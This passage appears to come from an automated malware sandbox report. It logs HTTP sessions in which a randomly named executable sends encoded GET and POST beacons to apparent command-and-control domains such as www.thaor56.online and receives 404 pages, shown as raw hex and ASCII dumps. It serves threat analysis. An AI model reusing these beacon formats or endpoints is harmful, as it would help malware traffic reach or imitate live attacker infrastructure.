                                                                      Data Ascii: Gfp8R9gO17HhP[+K!UH]k]*F9I?!S*@kpF38'!6I;ywV4-*"g)W3*i$v#TsT2r,.,$p][YZL'939}ZvS7YE<tz@4Q
                                                                      Jan 8, 2025 16:13:24.849328995 CET1075INData Raw: 80 a2 1f 2e 59 c3 13 2a 8b f2 11 b2 dc 3d 08 98 0e 49 8c 86 e3 56 31 3c 99 cc f7 b4 8d f8 d0 6c 1e ce 8d 50 2e 26 05 d1 a0 fb a2 71 ac ca 3c e7 e8 68 bd 62 96 de 3e cf a5 90 67 47 e1 e6 58 60 63 34 db 64 91 3e a2 66 13 7d 38 e5 d3 9d d8 b6 c3 44
                                                                      Data Ascii: .Y*=IV1<lP.&q<hb>gGX`c4d>f}8Dt"j2<q84bm;p6e&JaT:5aVB0t8<7s!n)*Wf-%zO`XI(B46;PIIdlbk$Fr6,eCD


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      8192.168.2.44976166.29.132.194803752C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Jan 8, 2025 16:13:26.669754982 CET493OUTGET /k6yn/?F4=Q0yHy&xP7x=tNpa1p20+8HvGGTFO8I9keuPU7tOKng9aQgmgnvjgQBap2YCvQVXfu4lL5fLGicbWcSejDEnKeIqzsVAbPYV4TqG+qZ72KE+To3i0rNZuThB0u31oMhQ62I= HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.orbitoasis.online
                                                                      Connection: close
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                                                                      Jan 8, 2025 16:13:27.395282030 CET1236INHTTP/1.1 404 Not Found
                                                                      keep-alive: timeout=5, max=100
                                                                      content-type: text/html
                                                                      transfer-encoding: chunked
                                                                      date: Wed, 08 Jan 2025 15:13:27 GMT
                                                                      server: LiteSpeed
                                                                      x-turbo-charged-by: LiteSpeed
                                                                      connection: close
                                                                      Data Raw: 32 37 38 34 0d 0a 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 [TRUNCATED]
                                                                      Data Ascii: 2784<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>404 Not Found</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section, footer { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .response-info { color: #CCCCCC; } .status-code { font-size: 500%; [TRUNCATED]
                                                                      Jan 8, 2025 16:13:27.395308018 CET224INData Raw: 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 35 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63
                                                                      Data Ascii: } .status-reason { font-size: 250%; display: block; } .contact-info, .reason-text { color: #000000; } .additional-info { backgr
                                                                      Jan 8, 2025 16:13:27.395334005 CET1236INData Raw: 6f 75 6e 64 2d 72 65 70 65 61 74 3a 20 6e 6f 2d 72 65 70 65 61 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 32 39 33 41 34 41 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20
                                                                      Data Ascii: ound-repeat: no-repeat; background-color: #293A4A; color: #FFFFFF; } .additional-info a { color: #FFFFFF; } .additional-info-items { padding: 20px 0; m
                                                                      Jan 8, 2025 16:13:27.395347118 CET1236INData Raw: 64 72 65 73 73 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 6c 65 66 74 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d
                                                                      Data Ascii: dress { text-align: left; } footer { text-align: center; margin: 60px 0; } footer a { text-decoration: none; } footer a img { border: 0
                                                                      Jan 8, 2025 16:13:27.395409107 CET1236INData Raw: 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 6c 65 66 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 20 20 20 20 20 20 20
                                                                      Data Ascii: text-align: left; position: absolute; right: 0; bottom: 0; margin: 0 10px; } .status-reason { display: inline;
                                                                      Jan 8, 2025 16:13:27.395431995 CET1236INData Raw: 38 66 44 6a 31 78 64 65 76 4e 6e 62 55 33 56 46 66 54 45 4c 2f 57 33 33 70 66 48 33 31 63 47 59 42 70 67 57 39 4c 62 61 33 49 63 38 43 38 69 41 37 37 4e 4c 65 35 31 34 76 75 38 42 50 6a 36 2f 6e 33 6c 43 64 2f 56 6b 67 4b 58 47 6b 77 59 55 51 48
                                                                      Data Ascii: 8fDj1xdevNnbU3VFfTEL/W33pfH31cGYBpgW9Lba3Ic8C8iA77NLe514vu8BPj6/n3lCd/VkgKXGkwYUQHAaM+yQunBmNSwbRVYh+kOcgMhvRDB1Md20YfiR+UFfvdIizp2v1vVjt0usa1pmNzAX2IFl5/xaE9aqQGSD6bxI0RZSw3uuF0YjQHepjMxHmd9IgC1NbY1VSkdeB4vXMH0KSQVIvQfERciMpcaFtW4H8iI0gB2MzfE
                                                                      Jan 8, 2025 16:13:27.395445108 CET896INData Raw: 4d 67 4a 70 2b 31 2f 49 61 78 71 47 41 52 7a 72 46 74 74 70 68 55 52 2b 4d 76 45 50 53 78 2b 36 6d 2f 70 43 78 45 69 33 59 37 70 34 38 35 45 53 41 56 6d 75 6c 64 76 7a 53 54 4b 77 32 66 71 48 53 47 4d 35 68 42 57 31 49 55 49 30 66 2f 4c 64 4f 4e
                                                                      Data Ascii: MgJp+1/IaxqGARzrFttphUR+MvEPSx+6m/pCxEi3Y7p485ESAVmuldvzSTKw2fqHSGM5hBW1IUI0f/LdONtEUKXGC95jK+Rg4QBVwNmlePZVjTxuo24kWMrQHg/nZzxDqmqFRFC799+dbEirMoVEXhVA07Y+GWNMOBCxIIpCgCpAX5KgHB6IQILHwE3HXk2XQVszdSkGECjUABhPLMdT/uKL0RIQ8DzYOKJu98V006LbSIkvBsR
                                                                      Jan 8, 2025 16:13:27.395457029 CET1236INData Raw: 4e 37 55 59 6c 4a 6d 75 73 6c 70 57 44 55 54 64 59 61 62 34 4c 32 7a 31 76 34 30 68 50 50 42 76 77 7a 71 4f 6c 75 54 76 68 44 42 56 42 32 61 34 49 79 78 2f 34 55 78 4c 72 78 38 67 6f 79 63 57 30 55 45 67 4f 34 79 32 4c 33 48 2b 55 6c 35 58 49 2f
                                                                      Data Ascii: N7UYlJmuslpWDUTdYab4L2z1v40hPPBvwzqOluTvhDBVB2a4Iyx/4UxLrx8goycW0UEgO4y2L3H+Ul5XI/4voc6rZkA3Bpv3njfS/nhR781E54N6t4OeWxQxuknguJ1S84ARR4RwAqtmaCFZnRiL2lbM+HaAC5npq+IwF+6hhfBWzNNlW6qCrGXRyza0yNOd1E1fsYUC7UV2Jop7XyXbsw90KYUInjpkRcecWfkEmdCAehgueuT
                                                                      Jan 8, 2025 16:13:27.395469904 CET1236INData Raw: 20 34 35 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0a 20 20 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c
                                                                      Data Ascii: 450%; } } </style> </head> <body> <div class="container"> <secion class="response-info"> <span class="status-code">404</span> <span class="status-reason">Not
                                                                      Jan 8, 2025 16:13:27.395483971 CET574INData Raw: 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 75 6c 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c
                                                                      Data Ascii: /li> </ul> </div> </div> </section> <footer> <div class="container"> <a href="http://cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=log


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      9192.168.2.449803202.92.5.23803752C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Jan 8, 2025 16:13:33.954086065 CET761OUTPOST /cboa/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Encoding: gzip, deflate
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.thaor56.online
                                                                      Origin: http://www.thaor56.online
                                                                      Cache-Control: no-cache
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Content-Length: 201
                                                                      Connection: close
                                                                      Referer: http://www.thaor56.online/cboa/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                                                                      Data Raw: 78 50 37 78 3d 58 64 64 7a 52 46 58 70 53 35 69 49 5a 39 33 30 71 66 4f 52 33 2f 31 32 6a 49 64 73 4a 63 39 50 64 4b 54 5a 57 46 30 62 30 70 50 67 37 45 6f 4f 30 48 6d 70 32 72 2b 46 63 58 7a 64 69 45 43 4e 7a 32 4a 69 56 67 64 4b 4d 56 57 48 41 4c 6b 72 57 57 43 55 48 30 66 37 6c 47 72 41 50 61 57 63 4e 4e 7a 48 56 51 55 7a 53 6d 46 42 35 38 59 6b 33 4b 70 41 35 51 51 63 4e 5a 45 6e 71 35 2b 6b 6b 74 57 63 4a 4d 78 44 6e 30 48 7a 6e 46 4e 62 59 74 62 6a 7a 58 4b 30 61 39 42 75 70 31 4c 4a 59 6e 63 68 52 6c 37 72 67 74 53 62 50 31 45 31 49 30 77 57 4b 2b 4c 67 2f 6f 78 72 70 38 76 75 44 51 3d 3d
                                                                      Data Ascii: xP7x=XddzRFXpS5iIZ930qfOR3/12jIdsJc9PdKTZWF0b0pPg7EoO0Hmp2r+FcXzdiECNz2JiVgdKMVWHALkrWWCUH0f7lGrAPaWcNNzHVQUzSmFB58Yk3KpA5QQcNZEnq5+kktWcJMxDn0HznFNbYtbjzXK0a9Bup1LJYnchRl7rgtSbP1E1I0wWK+Lg/oxrp8vuDQ==
                                                                      Jan 8, 2025 16:13:34.870903969 CET1236INHTTP/1.1 404 Not Found
                                                                      Connection: close
                                                                      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                      pragma: no-cache
                                                                      content-type: text/html
                                                                      content-length: 1251
                                                                      date: Wed, 08 Jan 2025 15:13:32 GMT
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(25 [TRUNCATED]
                                                                      Jan 8, 2025 16:13:34.870913982 CET234INData Raw: 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69
                                                                      Data Ascii: 5, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      10192.168.2.449820202.92.5.23803752C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Jan 8, 2025 16:13:36.506620884 CET781OUTPOST /cboa/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Encoding: gzip, deflate
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.thaor56.online
                                                                      Origin: http://www.thaor56.online
                                                                      Cache-Control: no-cache
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Content-Length: 221
                                                                      Connection: close
                                                                      Referer: http://www.thaor56.online/cboa/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                                                                      Data Raw: 78 50 37 78 3d 58 64 64 7a 52 46 58 70 53 35 69 49 5a 63 48 30 6d 65 4f 52 2f 2f 31 78 6d 49 64 73 53 4d 39 78 64 4b 50 5a 57 41 4d 78 30 37 72 67 38 68 55 4f 37 6c 65 70 78 72 2b 46 49 48 7a 63 68 30 43 57 7a 32 45 64 56 6c 64 4b 4d 56 43 48 41 4a 38 72 58 6c 71 58 45 45 66 35 77 57 72 43 42 36 57 63 4e 4e 7a 48 56 51 41 5a 53 6d 4e 42 34 4d 49 6b 34 4c 70 66 6c 67 51 66 45 35 45 6e 75 35 2b 6f 6b 74 57 69 4a 4e 74 35 6e 32 50 7a 6e 45 39 62 62 38 62 67 6f 48 4b 75 55 64 42 2f 36 33 37 4d 58 6d 56 53 5a 56 54 63 6f 38 47 30 4f 7a 4a 76 5a 46 52 42 59 2b 76 54 69 76 34 66 6b 2f 53 6e 59 61 71 46 34 47 6c 66 39 44 66 72 67 76 54 70 42 6c 45 65 35 55 4d 3d
                                                                      Data Ascii: xP7x=XddzRFXpS5iIZcH0meOR//1xmIdsSM9xdKPZWAMx07rg8hUO7lepxr+FIHzch0CWz2EdVldKMVCHAJ8rXlqXEEf5wWrCB6WcNNzHVQAZSmNB4MIk4LpflgQfE5Enu5+oktWiJNt5n2PznE9bb8bgoHKuUdB/637MXmVSZVTco8G0OzJvZFRBY+vTiv4fk/SnYaqF4Glf9DfrgvTpBlEe5UM=
                                                                      Jan 8, 2025 16:13:37.453592062 CET1236INHTTP/1.1 404 Not Found
                                                                      Connection: close
                                                                      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                      pragma: no-cache
                                                                      content-type: text/html
                                                                      content-length: 1251
                                                                      date: Wed, 08 Jan 2025 15:13:37 GMT
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(25 [TRUNCATED]
                                                                      Jan 8, 2025 16:13:37.453607082 CET224INData Raw: 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69
                                                                      Data Ascii: 5, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></bod
                                                                      Jan 8, 2025 16:13:37.453680992 CET10INData Raw: 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                      Data Ascii: y></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      11192.168.2.449838202.92.5.23803752C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Jan 8, 2025 16:13:39.052648067 CET10863OUTPOST /cboa/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Encoding: gzip, deflate
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.thaor56.online
                                                                      Origin: http://www.thaor56.online
                                                                      Cache-Control: no-cache
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Content-Length: 10301
                                                                      Connection: close
                                                                      Referer: http://www.thaor56.online/cboa/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                                                                      Data Raw: 78 50 37 78 3d 58 64 64 7a 52 46 58 70 53 35 69 49 5a 63 48 30 6d 65 4f 52 2f 2f 31 78 6d 49 64 73 53 4d 39 78 64 4b 50 5a 57 41 4d 78 30 37 6a 67 38 58 67 4f 36 45 65 70 77 72 2b 46 4c 48 7a 52 68 30 44 57 7a 32 63 5a 56 6c 68 30 4d 58 36 48 47 71 30 72 51 55 71 58 66 55 66 35 79 57 72 42 50 61 58 42 4e 4a 58 44 56 51 51 5a 53 6d 4e 42 34 4b 4d 6b 78 36 70 66 32 77 51 63 4e 5a 46 6f 71 35 2f 42 6b 74 50 5a 4a 4e 59 62 6e 6e 76 7a 6e 6b 74 62 55 75 44 67 31 58 4b 6f 58 64 41 69 36 33 32 63 58 69 38 70 5a 56 57 4c 6f 38 79 30 4b 6d 34 32 4f 6c 42 33 50 4f 36 50 36 6f 4d 67 72 4d 79 59 44 59 57 42 2f 6b 6c 51 69 68 48 64 6f 4e 75 2f 61 55 4d 49 6f 45 70 74 4a 51 6d 79 76 32 38 46 6f 55 30 4e 50 39 70 46 33 39 4b 59 6a 79 41 36 77 42 37 61 70 68 75 54 31 37 6c 6c 49 56 58 64 34 41 4d 4b 54 31 5a 4f 41 74 4b 47 46 4d 78 41 5a 69 7a 35 67 47 76 4f 71 46 37 70 33 57 34 41 53 46 59 32 47 39 7a 6d 76 64 56 6c 57 71 6a 36 34 42 62 6d 46 73 59 53 79 6c 56 4f 58 72 50 4b 58 31 58 71 78 6c 77 4a 67 62 2b 58 2b [TRUNCATED]
                                                                      Data Ascii: xP7x=XddzRFXpS5iIZcH0meOR//1xmIdsSM9xdKPZWAMx07jg8XgO6Eepwr+FLHzRh0DWz2cZVlh0MX6HGq0rQUqXfUf5yWrBPaXBNJXDVQQZSmNB4KMkx6pf2wQcNZFoq5/BktPZJNYbnnvznktbUuDg1XKoXdAi632cXi8pZVWLo8y0Km42OlB3PO6P6oMgrMyYDYWB/klQihHdoNu/aUMIoEptJQmyv28FoU0NP9pF39KYjyA6wB7aphuT17llIVXd4AMKT1ZOAtKGFMxAZiz5gGvOqF7p3W4ASFY2G9zmvdVlWqj64BbmFsYSylVOXrPKX1XqxlwJgb+X+OHGnWfZ62bYgFdQdIyMA6rzE+cr8amnFglZ3ZK+BanMNbZABdtFq8SlS4Bm8BNtalwF6dZC1pjq2jb/eBlOS2Q1XFwN3yUr4jbIN0w0vXjFU93SjTvYPChe8ly3zsZBBM765NbtiU1WlIzrgZPhn6nKFxYVMxJ/mOCvHiqZoByiLiklhgbVUX25WuPQTJks37oIgWPQ50qejew+fgNfANqMZ0Gxd4IA0kLsO9Dip2/XuvhkjyMWjUQXiYuW1snoKou9vFocaLghX9SYz2MZIxsA5t8feeV0mhC98Ab+iJQemIM5vI3k6PSZd9wCviRy2jTw7VHFb3mdErpuvoV7AWlF7nNrMneJBpK1MKL4GgZPvpiiHucgAnG2VyC075Ew6Qi87P00SGcAFHBHvHTTEezoob/zrdGjwo2ACftluFGl27IUsSYj3wuIuHnoOv+XnCWRVVTvunZzvg4tI7mU5w9GNce5XGykA3NudSLQNJjBgOpOyOgiiqDqLa3CBzRfxByZmYF4PQz4nH0J99LQYL9iniI8HtwF6VIllFAW7Xk7hi2hj4ypxtAg9vAYuyibaYWrGuS+XzzavwKGGpfyD3tgT9Os9wrm42G1Lx8viwxVE4QwYP1Bue3k1NgiMCG90XZXRSQOjeXAX8/it+ee4fZDa73tuzwRali [TRUNCATED]
                                                                      Jan 8, 2025 16:13:40.001337051 CET1236INHTTP/1.1 404 Not Found
                                                                      Connection: close
                                                                      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                      pragma: no-cache
                                                                      content-type: text/html
                                                                      content-length: 1251
                                                                      date: Wed, 08 Jan 2025 15:13:39 GMT
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
